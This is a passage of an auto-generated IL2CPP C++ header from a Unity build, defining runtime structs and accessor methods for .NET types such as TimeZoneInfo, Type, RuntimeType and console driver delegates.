static_cast<int32_t>(offsetof(TermInfoDriver_t9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_StaticFields, ____consoleColorToAnsiCode_41)); } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* get__consoleColorToAnsiCode_41() const { return ____consoleColorToAnsiCode_41; } inline Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83** get_address_of__consoleColorToAnsiCode_41() { return &____consoleColorToAnsiCode_41; } inline void set__consoleColorToAnsiCode_41(Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83* value) { ____consoleColorToAnsiCode_41 = value; Il2CppCodeGenWriteBarrier((&____consoleColorToAnsiCode_41), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TERMINFODRIVER_T9D1F8B74E923C24C63FBE861B6DDCE7CF05A3653_H #ifndef TIMEZONEINFO_T46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_H #define TIMEZONEINFO_T46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.TimeZoneInfo struct TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 : public RuntimeObject { public: // System.TimeSpan System.TimeZoneInfo::baseUtcOffset TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___baseUtcOffset_0; // System.String System.TimeZoneInfo::daylightDisplayName String_t* ___daylightDisplayName_1; // System.String System.TimeZoneInfo::displayName String_t* ___displayName_2; // System.String System.TimeZoneInfo::id String_t* ___id_3; // System.Collections.Generic.List`1<System.Collections.Generic.KeyValuePair`2<System.DateTime,System.TimeType>> System.TimeZoneInfo::transitions List_1_tD2FC74CFEE011F74F31183756A690154468817E9 * ___transitions_5; // System.String System.TimeZoneInfo::standardDisplayName String_t* ___standardDisplayName_7; // System.Boolean System.TimeZoneInfo::supportsDaylightSavingTime bool ___supportsDaylightSavingTime_8; // System.TimeZoneInfo/AdjustmentRule[] System.TimeZoneInfo::adjustmentRules AdjustmentRuleU5BU5D_t1106C3E56412DC2C8D9B745150D35E342A85D8AD* ___adjustmentRules_11; public: inline static int32_t get_offset_of_baseUtcOffset_0() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___baseUtcOffset_0)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_baseUtcOffset_0() const { return ___baseUtcOffset_0; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_baseUtcOffset_0() { return &___baseUtcOffset_0; } inline void set_baseUtcOffset_0(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___baseUtcOffset_0 = value; } inline static int32_t get_offset_of_daylightDisplayName_1() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___daylightDisplayName_1)); } inline String_t* get_daylightDisplayName_1() const { return ___daylightDisplayName_1; } inline String_t** get_address_of_daylightDisplayName_1() { return &___daylightDisplayName_1; } inline void set_daylightDisplayName_1(String_t* value) { ___daylightDisplayName_1 = value; Il2CppCodeGenWriteBarrier((&___daylightDisplayName_1), value); } inline static int32_t get_offset_of_displayName_2() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___displayName_2)); } inline String_t* get_displayName_2() const { return ___displayName_2; } inline String_t** get_address_of_displayName_2() { return &___displayName_2; } inline void set_displayName_2(String_t* value) { ___displayName_2 = value; Il2CppCodeGenWriteBarrier((&___displayName_2), value); } inline static int32_t get_offset_of_id_3() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___id_3)); } inline String_t* get_id_3() const { return ___id_3; } inline String_t** get_address_of_id_3() { return &___id_3; } inline void set_id_3(String_t* value) { ___id_3 = value; Il2CppCodeGenWriteBarrier((&___id_3), value); } inline static int32_t get_offset_of_transitions_5() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___transitions_5)); } inline List_1_tD2FC74CFEE011F74F31183756A690154468817E9 * get_transitions_5() const { return ___transitions_5; } inline List_1_tD2FC74CFEE011F74F31183756A690154468817E9 ** get_address_of_transitions_5() { return &___transitions_5; } inline void set_transitions_5(List_1_tD2FC74CFEE011F74F31183756A690154468817E9 * value) { ___transitions_5 = value; Il2CppCodeGenWriteBarrier((&___transitions_5), value); } inline static int32_t get_offset_of_standardDisplayName_7() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___standardDisplayName_7)); } inline String_t* get_standardDisplayName_7() const { return ___standardDisplayName_7; } inline String_t** get_address_of_standardDisplayName_7() { return &___standardDisplayName_7; } inline void set_standardDisplayName_7(String_t* value) { ___standardDisplayName_7 = value; Il2CppCodeGenWriteBarrier((&___standardDisplayName_7), value); } inline static int32_t get_offset_of_supportsDaylightSavingTime_8() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___supportsDaylightSavingTime_8)); } inline bool get_supportsDaylightSavingTime_8() const { return ___supportsDaylightSavingTime_8; } inline bool* get_address_of_supportsDaylightSavingTime_8() { return &___supportsDaylightSavingTime_8; } inline void set_supportsDaylightSavingTime_8(bool value) { ___supportsDaylightSavingTime_8 = value; } inline static int32_t get_offset_of_adjustmentRules_11() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777, ___adjustmentRules_11)); } inline AdjustmentRuleU5BU5D_t1106C3E56412DC2C8D9B745150D35E342A85D8AD* get_adjustmentRules_11() const { return ___adjustmentRules_11; } inline AdjustmentRuleU5BU5D_t1106C3E56412DC2C8D9B745150D35E342A85D8AD** get_address_of_adjustmentRules_11() { return &___adjustmentRules_11; } inline void set_adjustmentRules_11(AdjustmentRuleU5BU5D_t1106C3E56412DC2C8D9B745150D35E342A85D8AD* value) { ___adjustmentRules_11 = value; Il2CppCodeGenWriteBarrier((&___adjustmentRules_11), value); } }; struct TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields { public: // System.TimeZoneInfo System.TimeZoneInfo::local TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * ___local_4; // System.Boolean System.TimeZoneInfo::readlinkNotFound bool ___readlinkNotFound_6; // System.TimeZoneInfo System.TimeZoneInfo::utc TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * ___utc_9; // System.String System.TimeZoneInfo::timeZoneDirectory String_t* ___timeZoneDirectory_10; // Microsoft.Win32.RegistryKey System.TimeZoneInfo::timeZoneKey RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * ___timeZoneKey_12; // Microsoft.Win32.RegistryKey System.TimeZoneInfo::localZoneKey RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * ___localZoneKey_13; // System.Collections.ObjectModel.ReadOnlyCollection`1<System.TimeZoneInfo> System.TimeZoneInfo::systemTimeZones ReadOnlyCollection_1_tD63B9891087CF571DD4322388BDDBAEEB7606FE0 * ___systemTimeZones_14; public: inline static int32_t get_offset_of_local_4() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___local_4)); } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * get_local_4() const { return ___local_4; } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 ** get_address_of_local_4() { return &___local_4; } inline void set_local_4(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * value) { ___local_4 = value; Il2CppCodeGenWriteBarrier((&___local_4), value); } inline static int32_t get_offset_of_readlinkNotFound_6() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___readlinkNotFound_6)); } inline bool get_readlinkNotFound_6() const { return ___readlinkNotFound_6; } inline bool* get_address_of_readlinkNotFound_6() { return &___readlinkNotFound_6; } inline void set_readlinkNotFound_6(bool value) { ___readlinkNotFound_6 = value; } inline static int32_t get_offset_of_utc_9() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___utc_9)); } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * get_utc_9() const { return ___utc_9; } inline TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 ** get_address_of_utc_9() { return &___utc_9; } inline void set_utc_9(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * value) { ___utc_9 = value; Il2CppCodeGenWriteBarrier((&___utc_9), value); } inline static int32_t get_offset_of_timeZoneDirectory_10() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___timeZoneDirectory_10)); } inline String_t* get_timeZoneDirectory_10() const { return ___timeZoneDirectory_10; } inline String_t** get_address_of_timeZoneDirectory_10() { return &___timeZoneDirectory_10; } inline void set_timeZoneDirectory_10(String_t* value) { ___timeZoneDirectory_10 = value; Il2CppCodeGenWriteBarrier((&___timeZoneDirectory_10), value); } inline static int32_t get_offset_of_timeZoneKey_12() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___timeZoneKey_12)); } inline RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * get_timeZoneKey_12() const { return ___timeZoneKey_12; } inline RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 ** get_address_of_timeZoneKey_12() { return &___timeZoneKey_12; } inline void set_timeZoneKey_12(RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * value) { ___timeZoneKey_12 = value; Il2CppCodeGenWriteBarrier((&___timeZoneKey_12), value); } inline static int32_t get_offset_of_localZoneKey_13() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___localZoneKey_13)); } inline RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * get_localZoneKey_13() const { return ___localZoneKey_13; } inline RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 ** get_address_of_localZoneKey_13() { return &___localZoneKey_13; } inline void set_localZoneKey_13(RegistryKey_t29D81BFF6D6710C7AF7557F80446D514B0AB7574 * value) { ___localZoneKey_13 = value; Il2CppCodeGenWriteBarrier((&___localZoneKey_13), value); } inline static int32_t get_offset_of_systemTimeZones_14() { return static_cast<int32_t>(offsetof(TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_StaticFields, ___systemTimeZones_14)); } inline ReadOnlyCollection_1_tD63B9891087CF571DD4322388BDDBAEEB7606FE0 * get_systemTimeZones_14() const { return ___systemTimeZones_14; } inline ReadOnlyCollection_1_tD63B9891087CF571DD4322388BDDBAEEB7606FE0 ** get_address_of_systemTimeZones_14() { return &___systemTimeZones_14; } inline void set_systemTimeZones_14(ReadOnlyCollection_1_tD63B9891087CF571DD4322388BDDBAEEB7606FE0 * value) { ___systemTimeZones_14 = value; Il2CppCodeGenWriteBarrier((&___systemTimeZones_14), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TIMEZONEINFO_T46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777_H #ifndef TYPE_T_H #define TYPE_T_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Type struct Type_t : public MemberInfo_t { public: // System.RuntimeTypeHandle System.Type::_impl RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D ____impl_9; public: inline static int32_t get_offset_of__impl_9() { return static_cast<int32_t>(offsetof(Type_t, ____impl_9)); } inline RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D get__impl_9() const { return ____impl_9; } inline RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D * get_address_of__impl_9() { return &____impl_9; } inline void set__impl_9(RuntimeTypeHandle_t7B542280A22F0EC4EAC2061C29178845847A8B2D value) { ____impl_9 = value; } }; struct Type_t_StaticFields { public: // System.Reflection.MemberFilter System.Type::FilterAttribute MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * ___FilterAttribute_0; // System.Reflection.MemberFilter System.Type::FilterName MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * ___FilterName_1; // System.Reflection.MemberFilter System.Type::FilterNameIgnoreCase MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * ___FilterNameIgnoreCase_2; // System.Object System.Type::Missing RuntimeObject * ___Missing_3; // System.Char System.Type::Delimiter Il2CppChar ___Delimiter_4; // System.Type[] System.Type::EmptyTypes TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* ___EmptyTypes_5; // System.Reflection.Binder System.Type::defaultBinder Binder_t4D5CB06963501D32847C057B57157D6DC49CA759 * ___defaultBinder_6; public: inline static int32_t get_offset_of_FilterAttribute_0() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___FilterAttribute_0)); } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * get_FilterAttribute_0() const { return ___FilterAttribute_0; } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 ** get_address_of_FilterAttribute_0() { return &___FilterAttribute_0; } inline void set_FilterAttribute_0(MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * value) { ___FilterAttribute_0 = value; Il2CppCodeGenWriteBarrier((&___FilterAttribute_0), value); } inline static int32_t get_offset_of_FilterName_1() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___FilterName_1)); } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * get_FilterName_1() const { return ___FilterName_1; } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 ** get_address_of_FilterName_1() { return &___FilterName_1; } inline void set_FilterName_1(MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * value) { ___FilterName_1 = value; Il2CppCodeGenWriteBarrier((&___FilterName_1), value); } inline static int32_t get_offset_of_FilterNameIgnoreCase_2() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___FilterNameIgnoreCase_2)); } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * get_FilterNameIgnoreCase_2() const { return ___FilterNameIgnoreCase_2; } inline MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 ** get_address_of_FilterNameIgnoreCase_2() { return &___FilterNameIgnoreCase_2; } inline void set_FilterNameIgnoreCase_2(MemberFilter_t25C1BD92C42BE94426E300787C13C452CB89B381 * value) { ___FilterNameIgnoreCase_2 = value; Il2CppCodeGenWriteBarrier((&___FilterNameIgnoreCase_2), value); } inline static int32_t get_offset_of_Missing_3() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___Missing_3)); } inline RuntimeObject * get_Missing_3() const { return ___Missing_3; } inline RuntimeObject ** get_address_of_Missing_3() { return &___Missing_3; } inline void set_Missing_3(RuntimeObject * value) { ___Missing_3 = value; Il2CppCodeGenWriteBarrier((&___Missing_3), value); } inline static int32_t get_offset_of_Delimiter_4() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___Delimiter_4)); } inline Il2CppChar get_Delimiter_4() const { return ___Delimiter_4; } inline Il2CppChar* get_address_of_Delimiter_4() { return &___Delimiter_4; } inline void set_Delimiter_4(Il2CppChar value) { ___Delimiter_4 = value; } inline static int32_t get_offset_of_EmptyTypes_5() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___EmptyTypes_5)); } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* get_EmptyTypes_5() const { return ___EmptyTypes_5; } inline TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F** get_address_of_EmptyTypes_5() { return &___EmptyTypes_5; } inline void set_EmptyTypes_5(TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* value) { ___EmptyTypes_5 = value; Il2CppCodeGenWriteBarrier((&___EmptyTypes_5), value); } inline static int32_t get_offset_of_defaultBinder_6() { return static_cast<int32_t>(offsetof(Type_t_StaticFields, ___defaultBinder_6)); } inline Binder_t4D5CB06963501D32847C057B57157D6DC49CA759 * get_defaultBinder_6() const { return ___defaultBinder_6; } inline Binder_t4D5CB06963501D32847C057B57157D6DC49CA759 ** get_address_of_defaultBinder_6() { return &___defaultBinder_6; } inline void set_defaultBinder_6(Binder_t4D5CB06963501D32847C057B57157D6DC49CA759 * value) { ___defaultBinder_6 = value; Il2CppCodeGenWriteBarrier((&___defaultBinder_6), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TYPE_T_H #ifndef ASYNCCALLBACK_T3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4_H #define ASYNCCALLBACK_T3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.AsyncCallback struct AsyncCallback_t3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4 : public MulticastDelegate_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ASYNCCALLBACK_T3F3DA3BEDAEE81DD1D24125DF8EB30E85EE14DA4_H #ifndef INTERNALCANCELHANDLER_T2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A_H #define INTERNALCANCELHANDLER_T2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Console/InternalCancelHandler struct InternalCancelHandler_t2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A : public MulticastDelegate_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // INTERNALCANCELHANDLER_T2DD134D8150B67E2F9FAD1BC2E6BE92EED57968A_H #ifndef WINDOWSCANCELHANDLER_T1D05BCFB512603DCF87A126FE9969F1D876B9B51_H #define WINDOWSCANCELHANDLER_T1D05BCFB512603DCF87A126FE9969F1D876B9B51_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Console/WindowsConsole/WindowsCancelHandler struct WindowsCancelHandler_t1D05BCFB512603DCF87A126FE9969F1D876B9B51 : public MulticastDelegate_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // WINDOWSCANCELHANDLER_T1D05BCFB512603DCF87A126FE9969F1D876B9B51_H #ifndef CONSOLECANCELEVENTHANDLER_T6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4_H #define CONSOLECANCELEVENTHANDLER_T6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.ConsoleCancelEventHandler struct ConsoleCancelEventHandler_t6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4 : public MulticastDelegate_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // CONSOLECANCELEVENTHANDLER_T6F3B5D9C55C25FF6B53EFEDA9150EFE807311EB4_H #ifndef MATCHNUMBERDELEGATE_T15412AE1CF0D1909CB05C7DBB8079E9281CCA05D_H #define MATCHNUMBERDELEGATE_T15412AE1CF0D1909CB05C7DBB8079E9281CCA05D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeParse/MatchNumberDelegate struct MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D : public MulticastDelegate_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // MATCHNUMBERDELEGATE_T15412AE1CF0D1909CB05C7DBB8079E9281CCA05D_H #ifndef NULLCONSOLEDRIVER_T4608D1A2E1195946C2945E3459E15364CF4EC43D_H #define NULLCONSOLEDRIVER_T4608D1A2E1195946C2945E3459E15364CF4EC43D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.NullConsoleDriver struct NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D : public RuntimeObject { public: public: }; struct NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D_StaticFields { public: // System.ConsoleKeyInfo System.NullConsoleDriver::EmptyConsoleKeyInfo ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 ___EmptyConsoleKeyInfo_0; public: inline static int32_t get_offset_of_EmptyConsoleKeyInfo_0() { return static_cast<int32_t>(offsetof(NullConsoleDriver_t4608D1A2E1195946C2945E3459E15364CF4EC43D_StaticFields, ___EmptyConsoleKeyInfo_0)); } inline ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 get_EmptyConsoleKeyInfo_0() const { return ___EmptyConsoleKeyInfo_0; } inline ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 * get_address_of_EmptyConsoleKeyInfo_0() { return &___EmptyConsoleKeyInfo_0; } inline void set_EmptyConsoleKeyInfo_0(ConsoleKeyInfo_t5BE3CE05E8258CDB5404256E96AF7C22BC5DE768 value) { ___EmptyConsoleKeyInfo_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // NULLCONSOLEDRIVER_T4608D1A2E1195946C2945E3459E15364CF4EC43D_H #ifndef TYPEINFO_T9D6F65801A41B97F36138B15FD270A1550DBB3FC_H #define TYPEINFO_T9D6F65801A41B97F36138B15FD270A1550DBB3FC_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Reflection.TypeInfo struct TypeInfo_t9D6F65801A41B97F36138B15FD270A1550DBB3FC : public Type_t { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // TYPEINFO_T9D6F65801A41B97F36138B15FD270A1550DBB3FC_H #ifndef RUNTIMETYPE_T40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_H #define RUNTIMETYPE_T40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.RuntimeType struct RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F : public TypeInfo_t9D6F65801A41B97F36138B15FD270A1550DBB3FC { public: // System.MonoTypeInfo System.RuntimeType::type_info MonoTypeInfo_t9A65BA5324D14FDFEB7644EEE6E1BDF74B8A393D * ___type_info_26; // System.Object System.RuntimeType::GenericCache RuntimeObject * ___GenericCache_27; // System.Reflection.RuntimeConstructorInfo System.RuntimeType::m_serializationCtor RuntimeConstructorInfo_tF21A59967629968D0BE5D0DAF677662824E9629D * ___m_serializationCtor_28; public: inline static int32_t get_offset_of_type_info_26() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F, ___type_info_26)); } inline MonoTypeInfo_t9A65BA5324D14FDFEB7644EEE6E1BDF74B8A393D * get_type_info_26() const { return ___type_info_26; } inline MonoTypeInfo_t9A65BA5324D14FDFEB7644EEE6E1BDF74B8A393D ** get_address_of_type_info_26() { return &___type_info_26; } inline void set_type_info_26(MonoTypeInfo_t9A65BA5324D14FDFEB7644EEE6E1BDF74B8A393D * value) { ___type_info_26 = value; Il2CppCodeGenWriteBarrier((&___type_info_26), value); } inline static int32_t get_offset_of_GenericCache_27() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F, ___GenericCache_27)); } inline RuntimeObject * get_GenericCache_27() const { return ___GenericCache_27; } inline RuntimeObject ** get_address_of_GenericCache_27() { return &___GenericCache_27; } inline void set_GenericCache_27(RuntimeObject * value) { ___GenericCache_27 = value; Il2CppCodeGenWriteBarrier((&___GenericCache_27), value); } inline static int32_t get_offset_of_m_serializationCtor_28() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F, ___m_serializationCtor_28)); } inline RuntimeConstructorInfo_tF21A59967629968D0BE5D0DAF677662824E9629D * get_m_serializationCtor_28() const { return ___m_serializationCtor_28; } inline RuntimeConstructorInfo_tF21A59967629968D0BE5D0DAF677662824E9629D ** get_address_of_m_serializationCtor_28() { return &___m_serializationCtor_28; } inline void set_m_serializationCtor_28(RuntimeConstructorInfo_tF21A59967629968D0BE5D0DAF677662824E9629D * value) { ___m_serializationCtor_28 = value; Il2CppCodeGenWriteBarrier((&___m_serializationCtor_28), value); } }; struct RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields { public: // System.RuntimeType System.RuntimeType::ValueType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___ValueType_10; // System.RuntimeType System.RuntimeType::EnumType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___EnumType_11; // System.RuntimeType System.RuntimeType::ObjectType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___ObjectType_12; // System.RuntimeType System.RuntimeType::StringType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___StringType_13; // System.RuntimeType System.RuntimeType::DelegateType RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___DelegateType_14; // System.Type[] System.RuntimeType::s_SICtorParamTypes TypeU5BU5D_t7FE623A666B49176DE123306221193E888A12F5F* ___s_SICtorParamTypes_15; // System.RuntimeType System.RuntimeType::s_typedRef RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * ___s_typedRef_25; public: inline static int32_t get_offset_of_ValueType_10() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___ValueType_10)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_ValueType_10() const { return ___ValueType_10; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_ValueType_10() { return &___ValueType_10; } inline void set_ValueType_10(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___ValueType_10 = value; Il2CppCodeGenWriteBarrier((&___ValueType_10), value); } inline static int32_t get_offset_of_EnumType_11() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___EnumType_11)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_EnumType_11() const { return ___EnumType_11; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_EnumType_11() { return &___EnumType_11; } inline void set_EnumType_11(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___EnumType_11 = value; Il2CppCodeGenWriteBarrier((&___EnumType_11), value); } inline static int32_t get_offset_of_ObjectType_12() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___ObjectType_12)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_ObjectType_12() const { return ___ObjectType_12; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_ObjectType_12() { return &___ObjectType_12; } inline void set_ObjectType_12(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___ObjectType_12 = value; Il2CppCodeGenWriteBarrier((&___ObjectType_12), value); } inline static int32_t get_offset_of_StringType_13() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___StringType_13)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_StringType_13() const { return ___StringType_13; } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F ** get_address_of_StringType_13() { return &___StringType_13; } inline void set_StringType_13(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * value) { ___StringType_13 = value; Il2CppCodeGenWriteBarrier((&___StringType_13), value); } inline static int32_t get_offset_of_DelegateType_14() { return static_cast<int32_t>(offsetof(RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F_StaticFields, ___DelegateType_14)); } inline RuntimeType_t40F13BCEAD97478C72C4B40BFDC2A220161CDB8F * get_DelegateType_14() const { return ___DelegateType_14; } inline 